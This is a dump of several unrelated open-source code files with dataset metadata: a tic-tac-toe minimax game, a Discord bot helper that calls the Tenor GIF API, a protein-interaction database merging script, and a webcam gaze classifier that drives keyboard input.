OrganizationMemberGetUpdateDeleteAPI.as_view(),\n name=\"organization-member-details\",\n ),\n]\n","repo_name":"rajeshyadav456/allproject","sub_path":"soteria-backend-main/src/soteria/orgs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2120477353","text":"'''\nJoshua V. Esguerra\n170 - WX3L\nMinMax Algorithm\n\n\nReference:\nhttps://github.com/AlejoG10/python-tictactoe-ai-yt\n'''\n\nimport copy\nimport random\nimport pygame\nimport sys\nimport numpy as np\nfrom constants import *\n\n# initial pygame window\npygame.init()\nscreen = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"Tic Tac Toe\")\nscreen.fill(BG_COLOR)\n\nclass Board:\n def __init__(self):\n self.squares = np.zeros((ROWS,COLS)) # initialize values to 0\n self.empty_sqrs = self.squares # list of squares\n self.marked_sqrs = 0\n \n def mark_sqr(self,row,col,player):\n self.squares[row][col] = player\n self.marked_sqrs += 1 # to know when board is full\n\n def empty_sqr(self,row,col):\n return self.squares[row][col] == 0\n\n def isfull(self):\n return self.marked_sqrs == 9\n\n def isempty(self):\n return self.marked_sqrs == 0\n\n def get_empty_sqrs(self):\n empty_sqrs = []\n for row in range(ROWS):\n for col in range(COLS):\n if self.empty_sqr(row, col):\n empty_sqrs.append( (row, col) )\n \n return empty_sqrs\n\n # return 0 if no one won yet\n # return 1 if p1 wins\n # return 2 if p2 wins\n def final_state(self, show=False):\n # vertical wins\n for col in range(COLS):\n if self.squares[0][col] == self.squares[1][col] == self.squares[2][col] != 0:\n if show:\n color = CIRC_COLOR if self.squares[0][col] == 2 else CROSS_COLOR\n iPos = (col * SQSIZE + SQSIZE // 2, 20)\n fPos = (col * SQSIZE + SQSIZE // 2, HEIGHT - 20)\n pygame.draw.line(screen, color, iPos, fPos, LINE_WIDTH)\n return self.squares[0][col]\n\n # horizontal wins\n for row in range(ROWS):\n if self.squares[row][0] == self.squares[row][1] == self.squares[row][2] != 0:\n if show:\n color = CIRC_COLOR if self.squares[row][0] == 2 else CROSS_COLOR\n iPos = (20, row * SQSIZE + SQSIZE // 2)\n fPos = (WIDTH - 20, row * SQSIZE + SQSIZE // 2)\n pygame.draw.line(screen, color, iPos, fPos, LINE_WIDTH)\n return self.squares[row][0]\n\n # desc diagonal\n if self.squares[0][0] == self.squares[1][1] == self.squares[2][2] != 0:\n if show:\n color = CIRC_COLOR if self.squares[1][1] == 2 else CROSS_COLOR\n iPos = (20, 20)\n fPos = (WIDTH - 20, HEIGHT - 20)\n pygame.draw.line(screen, color, iPos, fPos, CROSS_WIDTH)\n return self.squares[1][1]\n\n # asc diagonal\n if self.squares[2][0] == self.squares[1][1] == self.squares[0][2] != 0:\n if show:\n color = CIRC_COLOR if self.squares[1][1] == 2 else CROSS_COLOR\n iPos = (20, HEIGHT - 20)\n fPos = (WIDTH - 20, 20)\n pygame.draw.line(screen, color, iPos, fPos, CROSS_WIDTH)\n return self.squares[1][1]\n\n # no win yet\n return 0\n\nclass AI:\n def __init__(self, player=2,level=1): # default player is player 2\n self.level = level\n self.player = player\n\n def random_move(self,board):\n empty_sqrs = board.get_empty_sqrs() # get all the list of empty squares in the board\n index = random.randrange(0,len(empty_sqrs))\n\n return empty_sqrs[index] # row, col\n\n # ai is going to minimize if maximize is false\n # ai is player 2\n def minimax(self,board,maximize):\n \n # check terminal case\n # checks current state of the board if match to a final_state\n case = board.final_state()\n\n # p1 
wins\n        # a p1 win scores +1 for the maximizer\n        if case == 1:\n            return 1, None # eval, move\n        \n        # p2 wins\n        # the AI minimizes, so a p2 win scores -1\n        if case == 2:\n            return -1, None\n\n        # draw\n        elif board.isfull():\n            return 0, None\n\n        # maximizing branch (evaluates moves for p1)\n        if maximize:\n            max_eval = -100\n            best_move = None\n            empty_sqrs = board.get_empty_sqrs()\n\n            # loop over each empty square\n            for (row, col) in empty_sqrs:\n                temp_board = copy.deepcopy(board) # deep copy the board so the main board is not modified\n                temp_board.mark_sqr(row,col,1) # make the move; 1 is p1\n                eval = self.minimax(temp_board, False)[0] # recurse for the minimizing opponent; [0] keeps the eval from the (eval, move) pair\n                if eval > max_eval:\n                    max_eval = eval\n                    best_move = (row, col)\n\n            return max_eval, best_move\n\n        # minimizing branch (evaluates moves for the AI, player 2 by default)\n        elif not maximize:\n            min_eval = 1000\n            best_move = None\n            empty_sqrs = board.get_empty_sqrs()\n\n            # loop over each empty square\n            for (row, col) in empty_sqrs:\n                temp_board = copy.deepcopy(board) # deep copy the board so the main board is not modified\n                temp_board.mark_sqr(row,col,self.player) # make the move; self.player is the AI\n                # switch back to the maximizer\n                eval = self.minimax(temp_board, True)[0] # recurse for the maximizing opponent; [0] keeps the eval from the (eval, move) pair\n                if eval < min_eval:\n                    min_eval = eval\n                    best_move = (row, col)\n\n            return min_eval, best_move\n\n
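    # (editor's note, not in the original) With this scoring, +1 means a p1\n    # win, -1 an AI (p2) win and 0 a draw, so the AI picks the child board\n    # with the smallest eval. For example, AI().minimax(board, False) on an\n    # empty board returns a pair like (0, (0, 0)), since perfect play from\n    # both sides ends in a draw.\n\n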
    def eval(self, main_board):\n        if self.level == 0:\n            # random choice\n            eval = 'random'\n            move = self.random_move(main_board) # row col\n        else:\n            # minimax algorithm\n            eval, move = self.minimax(main_board,False)\n\n        print(f'AI has chosen to mark the square in pos {move} with an eval of: {eval}')\n        return move\n\nclass Game:\n    def __init__(self,player,ai_player):\n        self.board = Board()\n        self.ai = AI()\n        self.player = player\n        self.gamemode = 'ai' # pvp or ai\n        self.running = True # If game over, set to False\n        self.show_lines()\n        self.ai_player = ai_player\n\n    # create the lines of tic tac toe\n    def show_lines(self):\n        # to clear initial screen\n        screen.fill(BG_COLOR)\n        # vertical\n        pygame.draw.line(screen,LINE_COLOR,(SQSIZE,0),(SQSIZE, HEIGHT), LINE_WIDTH)\n        pygame.draw.line(screen,LINE_COLOR,(WIDTH - SQSIZE,0),(WIDTH -SQSIZE, HEIGHT), LINE_WIDTH)\n\n        #horizontal\n        pygame.draw.line(screen,LINE_COLOR,(0,SQSIZE),(WIDTH, SQSIZE), LINE_WIDTH)\n        pygame.draw.line(screen,LINE_COLOR,(0,HEIGHT - SQSIZE),(WIDTH,HEIGHT -SQSIZE), LINE_WIDTH)\n\n    def draw_fig(self,row,col):\n        if self.ai_player == 1:\n            if self.player == 2:\n                # draw cross\n                pos1 = (col * SQSIZE + OFFSET,row * SQSIZE + OFFSET)\n                pos2 = (col * SQSIZE + SQSIZE - OFFSET,row * SQSIZE + SQSIZE - OFFSET)\n\n                pos3 = (col * SQSIZE + OFFSET,row * SQSIZE + SQSIZE - OFFSET)\n                pos4 = (col * SQSIZE + SQSIZE - OFFSET,row * SQSIZE + OFFSET)\n\n                pygame.draw.line(screen,CROSS_COLOR,pos1,pos2, CROSS_WIDTH)\n                pygame.draw.line(screen,CROSS_COLOR,pos3,pos4, CROSS_WIDTH)\n            elif self.player == 1:\n                # draw circle\n                center = (col * SQSIZE + SQSIZE//2,row *SQSIZE + SQSIZE//2)\n                pygame.draw.circle(screen, CIRC_COLOR, center, RADIUS, CIRC_WIDTH)\n        else:\n            if self.player == 1:\n                # draw cross\n                pos1 = (col * SQSIZE + OFFSET,row * SQSIZE + OFFSET)\n                pos2 = (col * SQSIZE + SQSIZE - OFFSET,row * SQSIZE + SQSIZE - OFFSET)\n\n                pos3 = (col * SQSIZE + OFFSET,row * SQSIZE + SQSIZE - OFFSET)\n                pos4 = (col * SQSIZE + SQSIZE - OFFSET,row * SQSIZE + OFFSET)\n\n                pygame.draw.line(screen,CROSS_COLOR,pos1,pos2, CROSS_WIDTH)\n                pygame.draw.line(screen,CROSS_COLOR,pos3,pos4, CROSS_WIDTH)\n            elif self.player == 2:\n                # draw circle\n                center = (col * SQSIZE + SQSIZE//2,row *SQSIZE + SQSIZE//2)\n                pygame.draw.circle(screen, CIRC_COLOR, center, RADIUS, CIRC_WIDTH)\n\n    # change players\n    def next_turn(self):\n        self.player = self.player % 2 + 1\n\n    # change game mode\n    def change_gamemode(self):\n        if self.gamemode == 'pvp':\n            self.gamemode = 'ai'\n        else:\n            self.gamemode = 'pvp'\n\n    def reset(self):\n        # restart with the same player setup\n        self.__init__(self.player, self.ai_player)\n\n    def isdone(self):\n        return self.board.final_state(show=True) != 0 or self.board.isfull()\n\n    def move(self, row, col):\n        self.board.mark_sqr(row, col, self.player)\n        self.draw_fig(row, col)\n        self.next_turn()\n\n\n\ndef main():\n    # get input from user\n    player_number = input(\"Player 1 or Player 2? Choose [1] or [2]\\n\")\n    pnum = int(player_number)\n    if pnum == 2:\n        ai_num = 1\n    else:\n        ai_num = 0\n    # game object\n    game = Game(pnum,ai_num)\n    board = game.board\n    ai = game.ai\n\n    while True:\n        for event in pygame.event.get():\n            if event.type==pygame.QUIT:\n                pygame.quit()\n                sys.exit()\n\n            if event.type == pygame.KEYDOWN:\n                # G - gamemode\n                if event.key == pygame.K_g:\n                    game.change_gamemode()\n                \n                # choose ai level\n                # Press - 0\n                if event.key == pygame.K_0:\n                    ai.level = 0\n                # Press - 1\n                if event.key == pygame.K_1:\n                    ai.level = 1\n\n                if event.key == pygame.K_r:\n                    game.reset()\n                    board = game.board\n                    ai = game.ai\n\n            # check mouse event\n            if event.type == pygame.MOUSEBUTTONDOWN:\n\n                # gets the equivalent position in the table self.squares\n                pos = event.pos\n                row = pos[1]//SQSIZE\n                col = pos[0]//SQSIZE\n\n                if board.empty_sqr(row,col) and game.running:\n                    # make move\n                    game.move(row, col)\n\n                    print(game.board)\n                    \n                    # check if game is done to prevent errors\n                    if game.isdone():\n                        game.running = False\n\n        if game.gamemode == 'ai' and game.player == ai.player and game.running:\n            # update screen\n            pygame.display.update() \n\n            # ai functions\n            row, col = ai.eval(board)\n\n            # make move\n            game.move(row, col)\n            \n            # check if game is done to prevent errors\n            if game.isdone():\n                game.running = False\n\n        pygame.display.update() \n\nmain()","repo_name":"jvesguerra/Tic-Tac-Toe","sub_path":"a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":11892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26909411011","text":"import json\nfrom pathlib import Path\nfrom discord.ext import commands\nimport requests\n\n\ndef return_default_config():\n    with open(Path(__file__).parent.parent / 'utils/files/config.json') as f:\n        return json.loads(f.read())\n\n\ndef return_cmd_config():\n    with open(Path(__file__).parent.parent / 'utils/files/cmds.json') as f:\n        return json.load(f)\n\n\ncmdCfg = return_cmd_config()\nconfig = return_default_config()\n\n\ndef is_enabled(group):\n    return bool(cmdCfg[group][\"enabled\"])\n\n\ndef get_meme(memes):\n    # fetch memes from the Tenor API\n\n    url = 
f'https://api.tenor.com/v1/search?q={memes}&key={config[\"tenor\"][\"key\"]}&limit={config[\"tenor\"][\"limit\"]}'\n r = requests.get(url)\n if r.status_code == 200:\n data = json.loads(r.content)\n return data\n","repo_name":"parushb/bot-light","sub_path":"src/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24425330451","text":"import numpy as np\r\nimport pandas as pd\r\n\r\n# iref interactome (downloaded from the omics integrator github page)\r\niref = pd.read_csv(\"raw_data/iref_mitab_miscore_2013_08_12_interactome.txt\", delimiter=\"\\t\",\r\n names=[\"Interactor 1\", \"Interactor 2\", \"iref_confidence\"], header=None, low_memory=False)\r\n\r\n# string interactome (downloaded only human interactome and names mapped, low confidence filtered out)\r\nstring = pd.read_csv(\"raw_data/9606.protein.links.v11.5.txt\", delimiter=\" \", low_memory=False)\r\nstring_info = pd.read_csv(\"raw_data/9606.protein.info.v11.5.txt\", delimiter=\"\\t\", low_memory=False)\r\nstring_mapper = dict(zip(list(string_info[\"#string_protein_id\"]), list(string_info[\"preferred_name\"])))\r\nstring[string.columns[0]] = string[string.columns[0]].map(string_mapper)\r\nstring[string.columns[1]] = string[string.columns[1]].map(string_mapper)\r\nstring.columns = [\"Interactor 1\", \"Interactor 2\", \"string_confidence\"]\r\nstring = string[string[\"string_confidence\"] > 700]\r\nstring[\"string_confidence\"] = np.array(string[\"string_confidence\"]) / 1000\r\nstring.dropna(inplace=True)\r\nstring.drop_duplicates([\"Interactor 1\", \"Interactor 2\"], inplace=True)\r\nstring.reset_index(drop=True, inplace=True)\r\n\r\n# Intact interactome (all human interactions used.)\r\nintact = pd.read_csv(\"raw_data/intact.txt\", usecols=[\"Alias(es) interactor A\", \"Alias(es) interactor B\",\r\n \"Taxid interactor A\", \"Taxid interactor B\",\r\n \"Confidence value(s)\"], delimiter=\"\\t\", low_memory=False)\r\nintact = intact[intact[\"Taxid interactor A\"] == \"taxid:9606(human)|taxid:9606(Homo sapiens)\"]\r\nintact = intact[intact[\"Taxid interactor B\"] == \"taxid:9606(human)|taxid:9606(Homo sapiens)\"]\r\nintact.drop([\"Taxid interactor A\", \"Taxid interactor B\"], axis=1, inplace=True)\r\nintact.columns = [\"Interactor 1\", \"Interactor 2\", \"intact_confidence\"]\r\nintact[\"intact_confidence\"] = np.array(intact[\"intact_confidence\"].apply(lambda x: x[-4:]), dtype=float)\r\nintact = intact[intact[\"Interactor 1\"].str.contains(\"(gene name)\")]\r\nintact = intact[intact[\"Interactor 2\"].str.contains(\"(gene name)\")]\r\nintact.reset_index(drop=True, inplace=True)\r\nintact[\"Interactor 1\"] = intact[\"Interactor 1\"].apply(lambda x: x.split(\"(gene name)\")[0].split(\"uniprotkb:\")[-1])\r\nintact[\"Interactor 2\"] = intact[\"Interactor 2\"].apply(lambda x: x.split(\"(gene name)\")[0].split(\"uniprotkb:\")[-1])\r\nintact.dropna(inplace=True)\r\nintact.drop_duplicates([\"Interactor 1\", \"Interactor 2\"], inplace=True)\r\nintact.reset_index(drop=True, inplace=True)\r\n\r\n# Hippie interactome (All human interactions used.)\r\nhippie = pd.read_csv(\"raw_data/hippie_current.txt\", delimiter=\"\\t\", header=None, usecols=[0, 2, 4],\r\n names=[\"Interactor 1\", \"Interactor 2\", \"iref_confidence\"], low_memory=False)\r\nhippie.columns = [\"Interactor 1\", \"Interactor 2\", \"hippie_confidence\"]\r\nhippie.dropna(inplace=True)\r\nhippie[\"Interactor 1\"] = hippie[\"Interactor 
1\"].apply(lambda x: x.split(\"_\")[0])\r\nhippie[\"Interactor 2\"] = hippie[\"Interactor 2\"].apply(lambda x: x.split(\"_\")[0])\r\nhippie.dropna(inplace=True)\r\nhippie.drop_duplicates([\"Interactor 1\", \"Interactor 2\"], inplace=True)\r\nhippie.reset_index(drop=True, inplace=True)\r\n\r\n# OmniPath (All interactions are used.)\r\nomnipath = pd.read_csv(\"raw_data/AllInteractions.csv\", usecols=[\"source\", \"target\", \"is_directed\", \"is_stimulation\",\r\n \"is_inhibition\", \"consensus_direction\",\r\n \"consensus_stimulation\", \"consensus_inhibition\"],\r\n low_memory=False)\r\nomnipath_info = pd.read_csv(\"raw_data/idmapping_2023_07_11.tsv\", delimiter=\"\\t\", low_memory=False)\r\nomnipath_mapper = dict(zip(list(omnipath_info[\"From\"]), list(omnipath_info[\"To\"])))\r\nomnipath[omnipath.columns[0]] = omnipath[omnipath.columns[0]].map(omnipath_mapper)\r\nomnipath[omnipath.columns[1]] = omnipath[omnipath.columns[1]].map(omnipath_mapper)\r\nomnipath.dropna(inplace=True)\r\nomnipath.drop_duplicates([\"source\", \"target\"], inplace=True)\r\nomnipath.reset_index(drop=True, inplace=True)\r\nomni_directed = np.zeros(len(omnipath))\r\nfor i, row in omnipath.iterrows():\r\n if row[7] and not row[6]: # consensus inhibition.\r\n omni_directed[i] = int(-1)\r\n elif row[6] and not row[7]: # consensus stimulation.\r\n omni_directed[i] = int(1)\r\n elif row[6] and row[7]: # consensus conflict.\r\n if row[3] and not row[4]:\r\n omni_directed[i] = int(1) # stimulation\r\n elif row[4] and not row[3]:\r\n omni_directed[i] = int(-1) # repression\r\n\r\nomnipath[\"omni_directed\"] = omni_directed\r\nomnipath = omnipath[omnipath[\"omni_directed\"] != 0]\r\nomnipath.drop([\"is_directed\", \"is_stimulation\", \"is_inhibition\", \"consensus_direction\", \"consensus_stimulation\",\r\n \"consensus_inhibition\"], axis=1, inplace=True)\r\nomnipath.columns = [\"Interactor 1\", \"Interactor 2\", \"omni_directed\"]\r\n\r\n# TRRUST (All directed interactions used.)\r\ntrrust = pd.read_csv(\"raw_data/trrust_rawdata.human.tsv\", delimiter=\"\\t\", header=None, usecols=[0, 1, 2],\r\n low_memory=False)\r\ntrrust = trrust[trrust[2] != \"Unknown\"]\r\ntrrust.columns = [\"Interactor 1\", \"Interactor 2\", \"tr_directed\"]\r\ntrrust.dropna(inplace=True)\r\ntrrust.drop_duplicates([\"Interactor 1\", \"Interactor 2\"], inplace=True)\r\ntrrust.reset_index(drop=True, inplace=True)\r\ntrrust[trrust.columns[2]] = trrust[trrust.columns[2]].map({\"Repression\": -1, \"Activation\": 1})\r\n\r\n# Biogrid (Human interactions limited to (direct interaction), (physical association), (association).)\r\nbiogrid = pd.read_csv(\"raw_data/BIOGRID-ALL-4.4.223.mitab.txt\", delimiter=\"\\t\", usecols=[\"Alt IDs Interactor A\",\r\n \"Alt IDs Interactor B\",\r\n \"Taxid Interactor A\",\r\n \"Taxid Interactor B\",\r\n \"Interaction Types\"], low_memory=False)\r\n\r\nbiogrid = biogrid[biogrid[\"Taxid Interactor A\"] == \"taxid:9606\"]\r\nbiogrid = biogrid[biogrid[\"Taxid Interactor B\"] == \"taxid:9606\"]\r\nbiogrid = biogrid[(biogrid[\"Interaction Types\"] == 'psi-mi:\"MI:0407\"(direct interaction)') |\r\n (biogrid[\"Interaction Types\"] == 'psi-mi:\"MI:0915\"(physical association)') |\r\n (biogrid[\"Interaction Types\"] == 'psi-mi:\"MI:0914\"(association)')]\r\n\r\nbiogrid[\"Alt IDs Interactor B\"] = biogrid[\"Alt IDs Interactor B\"].apply(lambda x: x.split(\"locuslink:\")[1].split(\"|\")[0])\r\nbiogrid[\"Alt IDs Interactor A\"] = biogrid[\"Alt IDs Interactor A\"].apply(lambda x: 
x.split(\"locuslink:\")[1].split(\"|\")[0])\r\nbiogrid.drop([\"Taxid Interactor A\", \"Taxid Interactor B\", \"Interaction Types\"], axis=1, inplace=True)\r\nbiogrid.dropna(inplace=True)\r\nbiogrid.reset_index(drop=True, inplace=True)\r\nbiogrid.columns = [\"Interactor 1\", \"Interactor 2\"]\r\nbiogrid[\"BIOGRID\"] = np.array([True]*len(biogrid))\r\n\r\n# Pathways (Only KEGG and Wikipathways used)\r\npathways = pd.read_csv(\"raw_data/CPDB_pathways_genes.tab\", delimiter=\"\\t\", usecols=[\"external_id\", \"source\",\r\n \"hgnc_symbol_ids\"], low_memory=False)\r\npathways = pathways[(pathways[\"source\"] == \"KEGG\") | (pathways[\"source\"] == \"Wikipathways\")]\r\npathways_dict = {list(pathways[\"external_id\"])[i]: item.split(\",\") for i, item in enumerate(list(pathways[\"hgnc_symbol_ids\"]))}\r\n\r\n# Complexes (CORUM database used)\r\ncomplexes = pd.read_csv(\"raw_data/Complexes_has.csv\", low_memory=False)\r\ncomplexes_dict = {list(complexes[\"Complex_id\"])[i]: set(item.split(\";\")) for i, item in enumerate(list(complexes[\"Genes\"]))}\r\n\r\n# Merge All (All merged into one dataframe.)\r\nall_merged = iref.merge(string, how=\"outer\")\r\nall_merged = all_merged.merge(hippie, how=\"outer\")\r\nall_merged = all_merged.merge(intact, how=\"outer\")\r\nall_merged = all_merged.merge(omnipath, how=\"outer\")\r\nall_merged = all_merged.merge(trrust, how=\"outer\")\r\nall_merged = all_merged.merge(biogrid, how=\"outer\")\r\n\r\nall_merged.drop_duplicates(inplace=True)\r\nall_merged.reset_index(drop=True, inplace=True)\r\n\r\n# Pathway & Complex Annotation\r\nall_merged[\"pathway\"] = np.array([False]*len(all_merged))\r\nall_merged[\"complex\"] = np.array([False]*len(all_merged))\r\n\r\nfor genes in pathways_dict.values():\r\n all_merged.loc[(all_merged[\"Interactor 1\"].isin(genes)) & (all_merged[\"Interactor 2\"].isin(genes)), \"pathway\"] = True\r\n\r\nfor genes in complexes_dict.values():\r\n all_merged.loc[(all_merged[\"Interactor 1\"].isin(genes)) & (all_merged[\"Interactor 2\"].isin(genes)), \"complex\"] = True\r\n\r\nall_merged[\"BIOGRID\"] = all_merged[\"BIOGRID\"].fillna(False)\r\nall_merged = all_merged.fillna(0)\r\n\r\n# Advanced filtering: all directed kept, all transition rules applicable hippi high conf. kept)\r\nall_merged = all_merged[(all_merged[\"omni_directed\"] != 0) | (all_merged[\"tr_directed\"] != 0) |\r\n (((all_merged[\"pathway\"] == True) | (all_merged[\"complex\"] == True))\r\n & (all_merged[\"BIOGRID\"] == True) & (all_merged[\"hippie_confidence\"] > 0.83))]\r\n\r\n# Confidence values determined.\r\nall_merged[\"Confidence\"] = np.zeros(len(all_merged))\r\nfor i, row in all_merged.iterrows():\r\n if row[6] != 0 or row[7] != 0:\r\n if row[4] != 0:\r\n all_merged[\"Confidence\"].at[i] = row[4]\r\n elif row[2] != 0 or row[3] != 0 or row[5] != 0:\r\n all_merged[\"Confidence\"].at[i] = max(row[2], row[3], row[5])\r\n else:\r\n all_merged[\"Confidence\"].at[i] = 1\r\n elif row[4] != 0:\r\n all_merged[\"Confidence\"].at[i] = row[4]\r\n else:\r\n all_merged[\"Confidence\"].at[i] = max(row[2], row[3], row[5])\r\n\r\n# OmniPath prioritized in conflicting directionality. 
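\r\n# (editor's note, not in the original) A toy example of the precedence rule\r\n# implemented below:\r\n#   omni_directed  tr_directed  ->  is_directed\r\n#        1             -1               1   (OmniPath wins on conflict)\r\n#        0             -1              -1   (falls back to TRRUST)\r\n#        0              0               0   (left undirected)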
\r\nall_merged[\"is_directed\"] = list(all_merged[\"omni_directed\"])\r\nall_merged[\"is_directed\"] = [list(all_merged[\"tr_directed\"])[i] if element == 0 else element for i, element in enumerate(list(all_merged[\"omni_directed\"]))]\r\n\r\n# Extra columns dropped.\r\nall_merged.drop([\"iref_confidence\", \"string_confidence\", \"hippie_confidence\", \"intact_confidence\", \"omni_directed\",\r\n                 \"tr_directed\"], axis=1, inplace=True)\r\n\r\n\r\n# Remove self-edges and add the bidirected edges for undirected\r\nall_merged = all_merged[np.array(all_merged[\"Interactor 1\"]) != np.array(all_merged[\"Interactor 2\"])]\r\nall_merged.reset_index(drop=True, inplace=True)\r\nedges = set(zip(list(all_merged[\"Interactor 1\"]), list(all_merged[\"Interactor 2\"])))\r\nnew_df = pd.DataFrame(columns=all_merged.columns)\r\nfor i, row in all_merged.iterrows():\r\n    if row[-1] == 0:\r\n        if (row[1], row[0]) not in edges:\r\n            new_row = row.copy()\r\n            new_row[\"Interactor 1\"] = row[1]\r\n            new_row[\"Interactor 2\"] = row[0]\r\n            new_df = pd.concat([new_df, new_row.to_frame().T], ignore_index=True)\r\nall_merged = all_merged.merge(new_df, how=\"outer\")\r\nall_merged.to_csv(\"Reference.csv\", index=False)\r\n","repo_name":"EnesSefaAyar/Graph-based_Cellular_Automata","sub_path":"source/create_reference.py","file_name":"create_reference.py","file_ext":"py","file_size_in_byte":11192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1898592701","text":"from __future__ import division\r\nimport cv2\r\nimport dlib\r\nimport pyautogui\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torchvision import datasets, models, transforms\r\nimport time\r\nimport os\r\nfrom PIL import Image\r\n\r\nLEFT_EYE_POINTS = [36, 37, 38, 39, 40, 41]\r\nRIGHT_EYE_POINTS = [42, 43, 44, 45, 46, 47]\r\n\r\najust = transforms.Compose([\r\n    transforms.Resize(256),\r\n    transforms.CenterCrop(224),\r\n    transforms.ToTensor(),\r\n    transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\r\n])\r\n\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n\r\ndef concatenate(image1, image2):\r\n    c1 = image1.shape\r\n    c2 = image2.shape\r\n    a1, b1 = c1[0], c1[1]\r\n    a2, b2 = c2[0], c2[1]\r\n    a = max(a1, a2)\r\n    imagefinale = np.array([[[255, 255, 255]] * (b1 + b2)] * a)\r\n    imagefinale.reshape((a, b1 + b2, 3))\r\n    for k in range(a1):\r\n        for p in range(b1):\r\n            imagefinale[k][p] = image1[k][p]\r\n    for j in range(a2):\r\n        for i in range(b2):\r\n            imagefinale[j][i + b1] = image2[j][i]\r\n    return imagefinale\r\n\r\n\r\nwebcam = cv2.VideoCapture(0)\r\nface_detector = dlib.get_frontal_face_detector()\r\nfile_name = os.path.abspath('')\r\ncwd = os.path.abspath(file_name)\r\nmodel_path = os.path.abspath(os.path.join(cwd, \"gaze_tracking/trained_models/shape_predictor_68_face_landmarks.dat\"))\r\npredictor = dlib.shape_predictor(model_path)\r\nmargin = 10\r\n\r\nPATH_l = './modele_1oeuil.pth'\r\nmodel_l = models.resnet18(pretrained=True)\r\nnum_ftrs = model_l.fc.in_features\r\nmodel_l.fc = nn.Linear(num_ftrs, 9)\r\n\r\nmodel_l = model_l.to(device)\r\nmodel_l.load_state_dict(torch.load(PATH_l))\r\nmodel_l.eval()\r\n\r\nPATH_r = './modele_1oeuildroit.pth'\r\nmodel_r = models.resnet18(pretrained=True)\r\nnum_ftrs = model_r.fc.in_features\r\nmodel_r.fc = nn.Linear(num_ftrs, 9)\r\n\r\nmodel_r = model_r.to(device)\r\nmodel_r.load_state_dict(torch.load(PATH_r))\r\nmodel_r.eval()\r\n\r\nclass_names = ['bd', 'bg', 'bm', 'hd', 'hg', 'hm', 'md', 'mg', 'mm']\r\n\r\n
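# (editor's note, not in the original) The nine classes appear to be French\r\n# initials for a 3x3 gaze grid: b/m/h = bas/milieu/haut (bottom/middle/top)\r\n# combined with g/m/d = gauche/milieu/droit (left/middle/right), which matches\r\n# the verdict checks in the loop below.\r\n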
while True:\r\n    try:\r\n        cpt_temps = 0\r\n        results_l = torch.zeros([1, 9])\r\n        results_r = torch.zeros([1, 9])\r\n        while cpt_temps < 3:\r\n            _, frame_o = webcam.read()\r\n            frame = frame_o.copy()\r\n            faces = face_detector(frame)\r\n            landmarks = predictor(frame, faces[0])\r\n\r\n            region_r = np.array([(landmarks.part(point).x, landmarks.part(point).y) for point in RIGHT_EYE_POINTS])\r\n            region_l = np.array([(landmarks.part(point).x, landmarks.part(point).y) for point in LEFT_EYE_POINTS])\r\n            region_l = region_l.astype(np.int32)\r\n            region_r = region_r.astype(np.int32)\r\n\r\n            min_x_r = np.min(region_r[:, 0]) - margin\r\n            max_x_r = np.max(region_r[:, 0]) + margin\r\n            min_y_r = np.min(region_r[:, 1]) - margin\r\n            max_y_r = np.max(region_r[:, 1]) + margin\r\n            frame_r = frame[min_y_r:max_y_r, min_x_r:max_x_r]\r\n\r\n            min_x_l = np.min(region_l[:, 0]) - margin\r\n            max_x_l = np.max(region_l[:, 0]) + margin\r\n            min_y_l = np.min(region_l[:, 1]) - margin\r\n            max_y_l = np.max(region_l[:, 1]) + margin\r\n            frame_l = frame[min_y_l:max_y_l, min_x_l:max_x_l]\r\n            frame_c = concatenate(frame_l, frame_r)\r\n\r\n            \"\"\"\r\n            np.resize(frame_l, 256)\r\n            image_l = torch.tensor(frame_l)\r\n            torchvision.transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(image_l)\r\n            \r\n            np.resize(frame_r, 256)\r\n            image_r = torch.tensor(frame_r)\r\n            torchvision.transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(image_r)\r\n            \"\"\"\r\n            image_r = Image.fromarray(frame_r)\r\n            image_l = Image.fromarray(frame_l)\r\n            image_r = ajust(image_r)\r\n            image_l = ajust(image_l)\r\n            image_r.unsqueeze_(0)\r\n            image_l.unsqueeze_(0)\r\n            image_r = image_r.to(device)\r\n            image_l = image_l.to(device)\r\n\r\n            # image_c = ajust(frame_c)\r\n\r\n            outputs_l = model_l(image_l)  # this should be a [1, 9] tensor of logits\r\n            results_l = results_l + outputs_l\r\n\r\n            outputs_r = model_r(image_r)  # this should be a [1, 9] tensor of logits\r\n            results_r = results_r + outputs_r\r\n\r\n            cpt_temps += 1\r\n\r\n        _, preds = torch.max(results_r + results_l, 1)\r\n        verdict = class_names[preds]\r\n\r\n        if verdict == 'bg':\r\n            pyautogui.keyDown('s')\r\n            time.sleep(0.75)\r\n            pyautogui.keyUp('s')\r\n            pyautogui.keyDown('q')\r\n            time.sleep(0.75)\r\n            pyautogui.keyUp('q')\r\n            # pyautogui.alert('bg') # Make an alert box appear and pause the program until OK is clicked.\r\n        if verdict == 'bd':\r\n            pyautogui.keyDown('s')\r\n            time.sleep(0.75)\r\n            pyautogui.keyUp('s')\r\n            pyautogui.keyDown('d')\r\n            time.sleep(0.75)\r\n            pyautogui.keyUp('d')\r\n        if verdict == 'bm':\r\n            pyautogui.keyDown('s')\r\n            time.sleep(0.75)\r\n            pyautogui.keyUp('s')\r\n        if verdict == 'md':\r\n            pyautogui.keyDown('d')\r\n            time.sleep(0.75)\r\n            pyautogui.keyUp('d')\r\n        if verdict == 'mm':\r\n            time.sleep(0.75)\r\n        if verdict == 'mg':\r\n            pyautogui.keyDown('q')\r\n            time.sleep(0.75)\r\n            pyautogui.keyUp('q')\r\n        if verdict == 'hg':\r\n            pyautogui.keyDown('z')\r\n            time.sleep(0.75)\r\n            pyautogui.keyUp('z')\r\n            pyautogui.keyDown('q')\r\n            time.sleep(0.75)\r\n            pyautogui.keyUp('q')\r\n        if verdict == 